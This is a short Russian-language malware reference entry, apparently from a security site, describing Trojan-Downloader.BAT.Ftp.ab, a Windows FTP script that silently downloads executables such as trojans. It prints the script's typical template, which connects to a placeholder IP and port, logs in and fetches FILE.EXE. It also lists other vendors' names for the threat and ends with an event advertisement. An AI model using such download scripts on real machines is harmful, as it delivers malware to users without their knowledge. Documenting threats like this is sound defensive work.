Security Lab

Trojan-Downloader. BAT.Ftp.ab

Trojan-Downloader. BAT.Ftp.ab

Скрипт для FTP-клиента OS Windows, выполняющий загрузку из интернета какого-либо исполняемого файла без ведома пользователя.

Скрипт для FTP-клиента OS Windows, выполняющий загрузку из интернета какого-либо исполняемого файла без ведома пользователя. Может использоваться для скачивания на машину пользователя троянских программ.

Обычно имеет следующий вид: 

  open XXX.XXX.XXX.XXX PPP
  user A B
  get FILE.EXE
  quit

Где «XXX.XXX.XXX.XXX» — IP-адрес, а «PPP» — порт компьютера, с которого производится скачивание файла.

Другие названия

Trojan-Downloader.BAT.Ftp.ab («Лаборатория Касперского») также известен как: Backdoor.BotGet.FtpB.Gen (SOFTWIN), W32/Sdbot.ftp (Panda)

Умеешь в ИБ?

Делись! Ближайший CIRF* уже 20 мая. Мероприятие бесплатное, но надо зарегистрироваться*

Зарегистрироваться

Реклама. 18+. ООО «МКО Системы», ИНН 7709458650
*Corporate incident response and forensics - корпоративное реагирование на инциденты и форензика.